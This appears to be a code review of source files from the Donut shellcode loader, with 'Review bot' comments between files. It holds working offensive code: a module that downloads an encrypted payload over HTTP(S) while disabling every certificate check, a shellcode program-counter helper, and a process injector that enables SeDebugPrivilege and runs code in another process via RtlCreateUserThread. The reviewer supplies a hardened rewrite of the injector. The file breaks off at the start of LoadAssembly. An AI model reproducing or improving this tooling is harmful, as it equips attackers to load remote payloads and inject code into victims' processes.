135 uint32_t rva2ofs (void *map, uint32_t rva) {
136 int i;
137
138 PIMAGE_SECTION_HEADER sh = SecHdr(map);
139
140 for (i=0; i<SecSize(map); i++) {
141 if (rva >= sh[i].VirtualAddress && rva < sh[i].VirtualAddress + sh[i].SizeOfRawData)
142 return sh[i].PointerToRawData + (rva - sh[i].VirtualAddress);
143 }
144 return -1;
145 }
146
147 void bin2h(void *map, char *fname, void *bin, uint32_t len) {
148 char label[32], file[32], *str;
149 uint32_t i;
150 uint8_t *p=(uint8_t*)bin;
151 FILE *fd;
152
153 memset(label, 0, sizeof(label));
154 memset(file, 0, sizeof(file));
155
156 #if defined(WINDOWS)
157 str = PathFindFileName(fname);
158 #else
159 str = basename(fname);
160 #endif
161 for(i=0; str[i] != 0 && i < 16;i++) {
162 if(str[i] == '.') {
163 file[i] = label[i] = '_';
164 } else {
165 label[i] = toupper(str[i]);
166 file[i] = tolower(str[i]);
167 }
168 }
169 if(map != NULL) {
170 strcat(label, is32(map) ? "_X86" : "_X64");
171 strcat(file, is32(map) ? "_x86" : "_x64");
172 }
173 strcat(file, ".h");
174
175 fd = fopen(file, "wb");
176
177 if(fd != NULL) {
178 fprintf(fd, "\nunsigned char %s[] = {", label);
179
180 for(i=0;i<len;i++) {
181 if(!(i % 12)) fprintf(fd, "\n ");
182 fprintf(fd, "0x%02x", p[i]);
183 if((i+1) != len) fprintf(fd, ", ");
184 }
185 fprintf(fd, "};\n\n");
186 fclose(fd);
187 printf(" [ saved code to %s\n", file);
188 } else printf(" [ unable to create file : %s\n", file);
189 }
190
191 /**
192 void bin2array(void *map, char *fname, void *bin, uint32_t len) {
193 char label[32], file[32], *str;
194 uint32_t i;
195 uint32_t *p=(uint32_t*)bin;
196 FILE *fd;
197
198 memset(label, 0, sizeof(label));
199 memset(file, 0, sizeof(file));
200
201 #if defined(WINDOWS)
202 str = PathFindFileName(fname);
203 #else
204 str = basename(fname);
205 #endif
206 for(i=0; str[i] != 0 && i < 16;i++) {
207 if(str[i] == '.') {
208 file[i] = label[i] = '_';
209 } else {
210 label[i] = toupper(str[i]);
211 file[i] = tolower(str[i]);
212 }
213 }
214
215 strcat(file, ".h");
216
217 fd = fopen(file, "wb");
218
219 if(fd != NULL) {
220 // align up by 4
221 len = (len & -4) + 4;
222 len >>= 2;
223
224 // declare the array
225 fprintf(fd, "\nunsigned int %s[%i];\n\n", label, len);
226
227 // initialize array
228 for(i=0; i<len; i++) {
229 fprintf(fd, "%s[%i] = 0x%08" PRIX32 ";\n", label, i, p[i]);
230 }
231 fclose(fd);
232 printf(" [ Saved array to %s\n", file);
233 } else printf(" [ unable to create file : %s\n", file);
234 }
235 */
236 // structure of COFF (.obj) file
237
238 //--------------------------//
239 // IMAGE_FILE_HEADER //
240 //--------------------------//
241 // IMAGE_SECTION_HEADER //
242 // * num sections //
243 //--------------------------//
244 // //
245 // //
246 // //
247 // section data //
248 // * num sections //
249 // //
250 // //
251 //--------------------------//
252 // IMAGE_SYMBOL //
253 // * num symbols //
254 //--------------------------//
255 // string table //
256 //--------------------------//
257
258 int main (int argc, char *argv[]) {
259 int fd, i;
260 struct stat fs;
261 uint8_t *map, *cs;
262 PIMAGE_SECTION_HEADER sh;
263 //PIMAGE_FILE_HEADER fh;
264 //PIMAGE_COFF_SYMBOLS_HEADER csh;
265 uint32_t ofs, len;
266
267 if (argc != 2) {
268 printf ("\n [ usage: file2h <file.exe | file.bin>\n");
269 return 0;
270 }
271
272 // open file for reading
273 fd = open(argv[1], O_RDONLY);
274
275 if(fd == 0) {
276 printf(" [ unable to open %s\n", argv[1]);
277 return 0;
278 }
279 // if file has some data
280 if(fstat(fd, &fs) == 0) {
281 // map into memory
282 map = (uint8_t*)mmap(NULL, fs.st_size,
283 PROT_READ, MAP_PRIVATE, fd, 0);
284 if(map != NULL) {
285 if(valid_dos_hdr(map) && valid_nt_hdr(map)) {
286 printf(" [ Found valid DOS and NT header.\n");
287 // get the .text section
288 sh = SecHdr(map);
289 // if a section header was returned
290 if(sh != NULL) {
291 printf(" [ Locating .text section.\n");
292 // locate the .text section
293 for(i=0; i<SecSize(map); i++) {
294 if(strcmp((char*)sh[i].Name, ".text") == 0) {
295 ofs = rva2ofs(map, sh[i].VirtualAddress);
296
297 if(ofs != -1) {
298 cs = (map + ofs);
299 len = sh[i].Misc.VirtualSize;
300 // convert to header file
301 bin2h(map, argv[1], cs, len);
302 break;
303 }
304 }
305 }
306 }
307 } else {
308 printf(" [ No valid DOS or NT header found.\n");
309 // treat file as binary
310 bin2h(NULL, argv[1], map, fs.st_size);
311 //bin2array(NULL, argv[1], map, fs.st_size);
312 }
313 munmap(map, fs.st_size);
314 }
315 }
316 close(fd);
317 return 0;
318 }
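Review bot: The failure checks in main are inverted for both system calls: `open()` returns -1 on error, not 0, so `if(fd == 0)` at line 275 never fires and fstat/mmap run on fd -1, and `mmap()` returns MAP_FAILED (`(void *)-1`, also what the bundled Windows replacement returns) rather than NULL, so `if(map != NULL)` at line 284 passes on failure and the header parsers dereference -1. The two lines should read `if(fd == -1) {` and `if(map != MAP_FAILED) {`. Nothing bounds the header walk against `fs.st_size` either: valid_dos_hdr, valid_nt_hdr and SecHdr follow `e_lfanew`, `SizeOfOptionalHeader` and `NumberOfSections` from the file without checking that those offsets fall inside the mapping, so a truncated or malformed input reads past the end of the map; a size check before line 285 (st_size at least sizeof(IMAGE_DOS_HEADER), and e_lfanew plus the NT headers and section table within st_size) would make the tool safe on arbitrary input. The `sh != NULL` test at line 290 is dead, since SecHdr (line 87) always returns a computed pointer.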
Binary diff not shown
0 /* mmap() replacement for Windows
1 *
2 * Author: Mike Frysinger <[email protected]>
3 * Placed into the public domain
4 */
5
6 /* References:
7 * CreateFileMapping: http://msdn.microsoft.com/en-us/library/aa366537(VS.85).aspx
8 * CloseHandle: http://msdn.microsoft.com/en-us/library/ms724211(VS.85).aspx
9 * MapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366761(VS.85).aspx
10 * UnmapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366882(VS.85).aspx
11 */
12
13 #include "mmap.h"
14
15 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset)
16 {
17 if (prot & ~(PROT_READ | PROT_WRITE | PROT_EXEC))
18 return MAP_FAILED;
19 if (fd == -1) {
20 if (!(flags & MAP_ANON) || offset)
21 return MAP_FAILED;
22 } else if (flags & MAP_ANON)
23 return MAP_FAILED;
24
25 DWORD flProtect;
26 if (prot & PROT_WRITE) {
27 if (prot & PROT_EXEC)
28 flProtect = PAGE_EXECUTE_READWRITE;
29 else
30 flProtect = PAGE_READWRITE;
31 } else if (prot & PROT_EXEC) {
32 if (prot & PROT_READ)
33 flProtect = PAGE_EXECUTE_READ;
34 else if (prot & PROT_EXEC)
35 flProtect = PAGE_EXECUTE;
36 } else
37 flProtect = PAGE_READONLY;
38
39 off_t end = length + offset;
40 HANDLE mmap_fd, h;
41 if (fd == -1)
42 mmap_fd = INVALID_HANDLE_VALUE;
43 else
44 mmap_fd = (HANDLE)_get_osfhandle(fd);
45 h = CreateFileMapping(mmap_fd, NULL, flProtect, DWORD_HI(end), DWORD_LO(end), NULL);
46 if (h == NULL)
47 return MAP_FAILED;
48
49 DWORD dwDesiredAccess;
50 if (prot & PROT_WRITE)
51 dwDesiredAccess = FILE_MAP_WRITE;
52 else
53 dwDesiredAccess = FILE_MAP_READ;
54 if (prot & PROT_EXEC)
55 dwDesiredAccess |= FILE_MAP_EXECUTE;
56 if (flags & MAP_PRIVATE)
57 dwDesiredAccess |= FILE_MAP_COPY;
58 void *ret = MapViewOfFile(h, dwDesiredAccess, DWORD_HI(offset), DWORD_LO(offset), length);
59 if (ret == NULL) {
60 CloseHandle(h);
61 ret = MAP_FAILED;
62 }
63 return ret;
64 }
65
66 void munmap(void *addr, size_t length)
67 {
68 UnmapViewOfFile(addr);
69 /* ruh-ro, we leaked handle from CreateFileMapping() ... */
70 }
71
72 #undef DWORD_HI
73 #undef DWORD_LO
0
1
2 #ifndef MMAP_H
3 #define MMAP_H
4
5 #include <io.h>
6 #include <windows.h>
7 #include <sys/types.h>
8
9 #define PROT_READ 0x1
10 #define PROT_WRITE 0x2
11 /* This flag is only available in WinXP+ */
12 #ifdef FILE_MAP_EXECUTE
13 #define PROT_EXEC 0x4
14 #else
15 #define PROT_EXEC 0x0
16 #define FILE_MAP_EXECUTE 0
17 #endif
18
19 #define MAP_SHARED 0x01
20 #define MAP_PRIVATE 0x02
21 #define MAP_ANONYMOUS 0x20
22 #define MAP_ANON MAP_ANONYMOUS
23 #define MAP_FAILED ((void *) -1)
24
25 #ifdef __USE_FILE_OFFSET64
26 # define DWORD_HI(x) (x >> 32)
27 # define DWORD_LO(x) ((x) & 0xffffffff)
28 #else
29 # define DWORD_HI(x) (0)
30 # define DWORD_LO(x) (x)
31 #endif
32
33 #ifdef __cplusplus
34 extern "C" {
35 #endif
36
37 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset);
38 void munmap(void *addr, size_t length);
39
40 #ifdef __cplusplus
41 }
42 #endif
43
44 #endif
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 // Function to return the program counter.
32 // Always place this at the end of payload.
33 // Tested with x86 build of MSVC 2019 and MinGW. YMMV.
34 #if defined(_MSC_VER)
35 #if defined(_M_IX86)
36 __declspec(naked) char *get_pc(void) {
37 __asm {
38 call pc_addr
39 pc_addr:
40 pop eax
41 sub eax, 5
42 ret
43 }
44 }
45 #endif
46 #elif defined(__GNUC__)
47 #if defined(__i386__)
48 asm (
49 ".global get_pc\n"
50 ".global _get_pc\n"
51 "_get_pc:\n"
52 "get_pc:\n"
53 " call pc_addr\n"
54 "pc_addr:\n"
55 " pop %eax\n"
56 " sub $5, %eax\n"
57 " ret\n"
58 );
59 #endif
60 #endif
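Review bot: Neither compiler branch has an `#else`, so on any target other than 32-bit x86 this file compiles to nothing and a caller of get_pc only finds out at link time. If 64-bit payload builds intentionally never reference get_pc (RIP-relative addressing would make it unnecessary, but that is not visible here), a comment stating that next to the `#if defined(_M_IX86)` / `#if defined(__i386__)` guards would document the contract; otherwise an `#else` with `#error "get_pc is only implemented for 32-bit x86"` turns the silent omission into a diagnostic. As a point of style, the GNU branch's `pc_addr` label is a file-scope assembler symbol; a numeric local label (`" call 1f\n"` / `"1:\n"`) avoids a duplicate-symbol error if this file is ever included into more than one translation unit.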
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 BOOL DownloadModule(PDONUT_INSTANCE inst) {
32 HINTERNET hin, con, req;
33 PBYTE buf;
34 DWORD s, n, rd, len, code=0;
35 BOOL bResult = FALSE, bSecure = FALSE;
36 URL_COMPONENTS uc;
37 CHAR host[DONUT_MAX_URL],
38 file[DONUT_MAX_URL];
39
40 // default flags for HTTP client
41 DWORD flags = INTERNET_FLAG_KEEP_CONNECTION |
42 INTERNET_FLAG_NO_CACHE_WRITE |
43 INTERNET_FLAG_NO_UI |
44 INTERNET_FLAG_RELOAD |
45 INTERNET_FLAG_NO_AUTO_REDIRECT;
46
47 Memset(&uc, 0, sizeof(uc));
48
49 uc.dwStructSize = sizeof(uc);
50 uc.lpszHostName = host;
51 uc.lpszUrlPath = file;
52 uc.dwHostNameLength = DONUT_MAX_URL;
53 uc.dwUrlPathLength = DONUT_MAX_URL;
54
55 DPRINT("Decoding URL %s", inst->http.url);
56
57 if(!inst->api.InternetCrackUrl(
58 inst->http.url, 0, ICU_DECODE, &uc)) {
59 return FALSE;
60 }
61
62 bSecure = (uc.nScheme == INTERNET_SCHEME_HTTPS);
63
64 // if secure connection, update the flags to ignore
65 // invalid certificates
66 if(bSecure) {
67 flags |= INTERNET_FLAG_IGNORE_CERT_CN_INVALID |
68 INTERNET_FLAG_IGNORE_CERT_DATE_INVALID |
69 INTERNET_FLAG_SECURE;
70 }
71
72 DPRINT("Initializing WININET");
73
74 hin = inst->api.InternetOpen(
75 NULL, INTERNET_OPEN_TYPE_PRECONFIG,
76 NULL, NULL, 0);
77
78 if(hin == NULL) return FALSE;
79
80 DPRINT("Creating %s connection for %s",
81 bSecure ? "HTTPS" : "HTTP", host);
82
83 con = inst->api.InternetConnect(
84 hin, host,
85 bSecure ? INTERNET_DEFAULT_HTTPS_PORT : INTERNET_DEFAULT_HTTP_PORT,
86 NULL, NULL,
87 INTERNET_SERVICE_HTTP, 0, 0);
88
89 if(con != NULL) {
90 DPRINT("Creating HTTP %s request for %s",
91 inst->http.req, file);
92
93 req = inst->api.HttpOpenRequest(
94 con, inst->http.req,
95 file, NULL, NULL, NULL, flags, 0);
96
97 if(req != NULL) {
98
99 // see if we should ignore invalid certificates for this request
100 if(bSecure) {
101 if(flags & INTERNET_FLAG_IGNORE_CERT_CN_INVALID) {
102 n = sizeof (s);
103
104 s = SECURITY_FLAG_IGNORE_UNKNOWN_CA |
105 SECURITY_FLAG_IGNORE_CERT_DATE_INVALID |
106 SECURITY_FLAG_IGNORE_CERT_CN_INVALID |
107 SECURITY_FLAG_IGNORE_WRONG_USAGE |
108 SECURITY_FLAG_IGNORE_REVOCATION;
109
110 DPRINT("Setting option to ignore invalid certificates");
111
112 inst->api.InternetSetOption(
113 req,
114 INTERNET_OPTION_SECURITY_FLAGS,
115 &s,
116 sizeof(s));
117 }
118 }
119 DPRINT("Sending request");
120
121 if(inst->api.HttpSendRequest(req, NULL, 0, NULL, 0)) {
122 len = sizeof(DWORD);
123 code = 0;
124 DPRINT("Querying status code");
125
126 if(inst->api.HttpQueryInfo(
127 req,
128 HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER,
129 &code, &len, 0))
130 {
131 DPRINT("Code is %ld", code);
132
133 if(code == HTTP_STATUS_OK) {
134 DPRINT("Querying content length");
135
136 len = sizeof(SIZE_T);
137 inst->mod_len = 0;
138
139 if(inst->api.HttpQueryInfo(
140 req,
141 HTTP_QUERY_CONTENT_LENGTH | HTTP_QUERY_FLAG_NUMBER,
142 &inst->mod_len, &len, 0))
143 {
144 if(inst->mod_len != 0) {
145 DPRINT("Allocating memory for module");
146
147 inst->module.p = inst->api.VirtualAlloc(
148 NULL, inst->mod_len,
149 MEM_COMMIT | MEM_RESERVE,
150 PAGE_READWRITE);
151
152 if(inst->module.p != NULL) {
153 rd = 0;
154 DPRINT("Downloading module into memory");
155 bResult = inst->api.InternetReadFile(
156 req,
157 inst->module.p,
158 inst->mod_len, &rd);
159 }
160 }
161 }
162 }
163 }
164 }
165 DPRINT("Closing request handle");
166 inst->api.InternetCloseHandle(req);
167 }
168 DPRINT("Closing HTTP connection");
169 inst->api.InternetCloseHandle(con);
170 }
171 DPRINT("Closing internet handle");
172 inst->api.InternetCloseHandle(hin);
173
174 #if !defined(NOCRYPTO)
175 if(bResult) {
176 PDONUT_MODULE mod = inst->module.p;
177
178 DPRINT("Decrypting %lli bytes of module", inst->mod_len);
179
180 donut_decrypt(inst->mod_key.mk,
181 inst->mod_key.ctr,
182 mod,
183 inst->mod_len);
184
185 DPRINT("Generating hash to verify decryption");
186 ULONG64 mac = maru(inst->sig, inst->iv);
187
188 DPRINT("Module : %016llx | Result : %016llx", mod->mac, mac);
189
190 if(mac != mod->mac) {
191 DPRINT("Decryption failed");
192 return FALSE;
193 }
194 }
195 #endif
196 return bResult;
197 }
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include <Windows.h>
32 #include <stdio.h>
33 #include <tlhelp32.h>
34
35 #pragma comment(lib, "advapi32.lib")
36 #pragma comment(lib, "shell32.lib")
37 #pragma comment(lib, "user32.lib")
38
39 typedef struct _CLIENT_ID {
40 PVOID UniqueProcess;
41 PVOID UniqueThread;
42 } CLIENT_ID, *PCLIENT_ID;
43
44 typedef NTSTATUS (NTAPI *RtlCreateUserThread_t) (
45 IN HANDLE ProcessHandle,
46 IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL,
47 IN BOOLEAN CreateSuspended,
48 IN ULONG StackZeroBits,
49 IN OUT PULONG StackReserved,
50 IN OUT PULONG StackCommit,
51 IN PVOID StartAddress,
52 IN PVOID StartParameter OPTIONAL,
53 OUT PHANDLE ThreadHandle,
54 OUT PCLIENT_ID ClientID);
55
56 BOOL EnablePrivilege(PCHAR szPrivilege){
57 HANDLE hToken;
58 BOOL bResult;
59 LUID luid;
60 TOKEN_PRIVILEGES tp;
61
62 // open token for current process
63 bResult = OpenProcessToken(GetCurrentProcess(),
64 TOKEN_ADJUST_PRIVILEGES, &hToken);
65
66 if(!bResult) return FALSE;
67
68 // lookup privilege
69 bResult = LookupPrivilegeValue(NULL, szPrivilege, &luid);
70 if(bResult){
71 tp.PrivilegeCount = 1;
72 tp.Privileges[0].Luid = luid;
73 tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
74
75 // adjust token
76 bResult = AdjustTokenPrivileges(hToken, FALSE, &tp, 0, NULL, NULL);
77 }
78 CloseHandle(hToken);
79 return bResult;
80 }
81
82 // display error message for last error code
83 VOID xstrerror (PCHAR fmt, ...){
84 PCHAR error=NULL;
85 va_list arglist;
86 CHAR buffer[1024];
87 DWORD dwError=GetLastError();
88
89 va_start(arglist, fmt);
90 vsnprintf(buffer, ARRAYSIZE(buffer), fmt, arglist);
91 va_end (arglist);
92
93 if (FormatMessage (
94 FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
95 NULL, dwError, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
96 (LPSTR)&error, 0, NULL))
97 {
98 printf(" [ %s : %s\n", buffer, error);
99 LocalFree (error);
100 } else {
101 printf(" [ %s error : %08lX\n", buffer, dwError);
102 }
103 }
104
105 DWORD name2pid(PCHAR procName){
106 HANDLE hSnap;
107 PROCESSENTRY32 pe32;
108 DWORD pid=0;
109
110 // create snapshot of system
111 hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
112 if(hSnap == INVALID_HANDLE_VALUE) return 0;
113
114 pe32.dwSize = sizeof(PROCESSENTRY32);
115
116 // get first process
117 if(Process32First(hSnap, &pe32)){
118 do {
119 if(!lstrcmpi(pe32.szExeFile, procName)){
120 pid=pe32.th32ProcessID;
121 break;
122 }
123 } while(Process32Next(hSnap, &pe32));
124 }
125 CloseHandle(hSnap);
126 return pid;
127 }
128
129 BOOL injectPIC(DWORD id, LPVOID code, DWORD codeLen) {
130 SIZE_T wr;
131 HANDLE hp,ht;
132 LPVOID cs;
133 RtlCreateUserThread_t pRtlCreateUserThread;
134 HMODULE hn;
135 CLIENT_ID cid;
136 NTSTATUS nt=~0UL;
137 DWORD t;
138
139 // 1. resolve API address
140 hn = GetModuleHandle("ntdll.dll");
141 pRtlCreateUserThread=(RtlCreateUserThread_t)
142 GetProcAddress(hn, "RtlCreateUserThread");
143
144 printf(" [ opening process %li\n", id);
145 // 2. open the target process
146 hp=OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);
147
148 if(hp == NULL) return FALSE;
149
150 // 3. allocate executable-read-write (XRW) memory for payload
151 printf(" [ allocating memory for payload.\n");
152 cs=VirtualAllocEx(hp, NULL, codeLen,
153 MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
154
155 printf(" [ writing code to %p.\n", cs);
156 // 4. copy the payload to remote memory
157 WriteProcessMemory(hp, cs, code, codeLen, &wr);
158 VirtualProtectEx(hp, cs, codeLen, PAGE_EXECUTE_READ, &t);
159
160 printf(" [ press any key to continue.\n");
161 getchar();
162
163 // 5. execute payload in remote process
164 printf(" [ creating new thread.\n");
165 nt = pRtlCreateUserThread(hp, NULL, FALSE, 0, NULL,
166 NULL, cs, NULL, &ht, &cid);
167
168 printf(" [ nt status is %lx\n", nt);
169 WaitForSingleObject(ht, INFINITE);
170
171 // 6. close remote thread handle
172 CloseHandle(ht);
173
174 // 7. free remote memory
175 printf(" [ freeing memory.\n");
176 VirtualFreeEx(hp, cs, codeLen, MEM_RELEASE | MEM_DECOMMIT);
177
178 // 8. close remote process handle
179 CloseHandle(hp);
180 return nt == 0; // STATUS_SUCCESS
181 }
182
183 DWORD getdata(PCHAR path, LPVOID *data){
184 HANDLE hf;
185 DWORD len,rd=0;
186
187 // 1. open the file
188 hf=CreateFile(path, GENERIC_READ, 0, 0,
189 OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
190
191 if(hf!=INVALID_HANDLE_VALUE){
192 // get file size
193 len=GetFileSize(hf, 0);
194 // allocate memory
195 *data=malloc(len + 16);
196 // read file contents into memory
197 ReadFile(hf, *data, len, &rd, 0);
198 CloseHandle(hf);
199 }
200 return rd;
201 }
202
203 int main(int argc, char *argv[]){
204 LPVOID code;
205 SIZE_T code_len;
206 DWORD pid;
207
208 if (argc != 3){
209 printf("\n [ usage: inject <process id | process name> <payload.bin>\n");
210 return 0;
211 }
212
213 if(!EnablePrivilege(SE_DEBUG_NAME)) {
214 printf(" [ cannot enable SeDebugPrivilege.\n");
215 }
216
217 // get pid
218 pid=atoi(argv[1]);
219 if(pid==0) pid=name2pid(argv[1]);
220
221 if(pid==0) {
222 printf(" [ unable to obtain process id.\n");
223 return 0;
224 }
225 // pic
226 code_len = getdata(argv[2], &code);
227 if(code_len == 0) {
228 printf(" [ unable to read payload.\n");
229 return 0;
230 }
231 injectPIC(pid, code, code_len);
232 free(code);
233 return 0;
234 }
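Review bot: injectPIC proceeds to WriteProcessMemory and the remote thread creation without checking that VirtualAllocEx (line 152) returned a non-NULL cs, that GetProcAddress (lines 141–142) actually resolved RtlCreateUserThread, or that the thread was created — on failure a NULL function pointer is called and ht is used uninitialized in WaitForSingleObject (line 169). The cleanup on line 176 also cannot work as written: VirtualFreeEx with MEM_RELEASE requires dwSize to be 0 and must not be combined with MEM_DECOMMIT, so the call fails and the RX payload stays mapped in the target after the injector exits. Separately, AdjustTokenPrivileges in EnablePrivilege (line 76) returns TRUE even when the privilege was not assigned, so that function should also require `GetLastError() == ERROR_SUCCESS` before reporting success. The rewrite below adds the missing checks in injectPIC and fixes the free.
```c
BOOL injectPIC(DWORD id, LPVOID code, DWORD codeLen) {
    // … unchanged: locals …
    hn = GetModuleHandle("ntdll.dll");
    pRtlCreateUserThread = (RtlCreateUserThread_t)
      GetProcAddress(hn, "RtlCreateUserThread");
    if(pRtlCreateUserThread == NULL) return FALSE;

    // … unchanged: OpenProcess and its NULL check …

    cs = VirtualAllocEx(hp, NULL, codeLen,
      MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if(cs == NULL) { CloseHandle(hp); return FALSE; }

    if(!WriteProcessMemory(hp, cs, code, codeLen, &wr) || wr != codeLen) {
      VirtualFreeEx(hp, cs, 0, MEM_RELEASE);
      CloseHandle(hp);
      return FALSE;
    }
    // … unchanged: VirtualProtectEx, getchar …

    nt = pRtlCreateUserThread(hp, NULL, FALSE, 0, NULL,
      NULL, cs, NULL, &ht, &cid);
    if(nt == 0) {                      // STATUS_SUCCESS: ht is valid only then
      WaitForSingleObject(ht, INFINITE);
      CloseHandle(ht);
    }

    // MEM_RELEASE requires dwSize == 0 and cannot be combined with MEM_DECOMMIT
    VirtualFreeEx(hp, cs, 0, MEM_RELEASE);
    CloseHandle(hp);
    return nt == 0;
}
```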
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 BOOL LoadAssembly(PDONUT_INSTANCE inst, PDONUT_ASSEMBLY pa) {
32 PDONUT_MODULE mod;
